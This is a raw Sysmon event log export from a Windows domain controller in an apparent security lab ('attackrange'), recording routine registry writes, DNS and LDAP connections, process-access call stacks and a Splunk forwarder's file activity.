13241300x80000000000000004112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:10.299{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d72624-0x284b47d5) 13241300x80000000000000004111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:10.299{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7262c-0x8a0fafd5) 22542200x80000000000000004110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.265{266CAFBE-646C-6064-1500-00000000AE01}1316attackrange.local0type: 2 win-dc-892.attackrange.local;10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000004109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.255{266CAFBE-646C-6064-1500-00000000AE01}1316win-dc-892.attackrange.local9501type: 6 ;10.0.1.14;C:\Windows\System32\svchost.exe 23542300x80000000000000004108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.221{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=515C4C759C39D858B32E2DEB50AED2EC,SHA256=A067E2C9F4C70BFB2F3F2E409532881F56B2BEE355FCF0E06B766D2AE1F6944D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.128{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.128{266CAFBE-64C1-6064-9500-00000000AE01}47084700C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000004105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.259{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local57840- 
354300x80000000000000004104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.259{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62324- 354300x80000000000000004103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.258{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62687- 354300x80000000000000004102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.258{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58733- 354300x80000000000000004101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.255{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53567-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000004100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.255{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53567-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000004099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.253{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local55108- 
354300x80000000000000004098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.252{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local53566-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000004097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.252{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-892.attackrange.local53566-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000004096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.249{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local56348- 354300x80000000000000004095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.249{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruefalse10.0.1.14win-dc-892.attackrange.local56348-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000004094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.248{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56395- 10341000x80000000000000004093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.081{266CAFBE-64C1-6064-9300-00000000AE01}8721176C:\Windows\system32\LogonUI.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\logoncontroller.dll+2eef5|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.081{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.081{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.003{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8A4B8EF9C49EB16D2C1588A71BB03BB,SHA256=29008B313DE5D74F75085BD9938268E169A0027277682FA9961B96AA221191AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.980{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.980{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.980{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.980{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 18141800x80000000000000004393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 
12:02:11.980{266CAFBE-646C-6064-0F00-00000000AE01}1116\TSVCPIPE-b7ec3ca2-9bd6-4c2b-86e9-54daa17e0583C:\Windows\System32\svchost.exe 10341000x80000000000000004392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.964{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.964{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.964{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.964{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.964{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.964{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.964{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.964{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.964{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.964{266CAFBE-646C-6064-0F00-00000000AE01}1116812C:\Windows\System32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\termsrv.dll+47f71|c:\windows\system32\termsrv.dll+1982c|c:\windows\system32\termsrv.dll+2320b|c:\windows\system32\termsrv.dll+22643|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 154100x80000000000000004382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.950{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe10.0.14393.3503 (rs1_release.200131-0410)RDP Clipboard MonitorMicrosoft® Windows® Operating SystemMicrosoft 
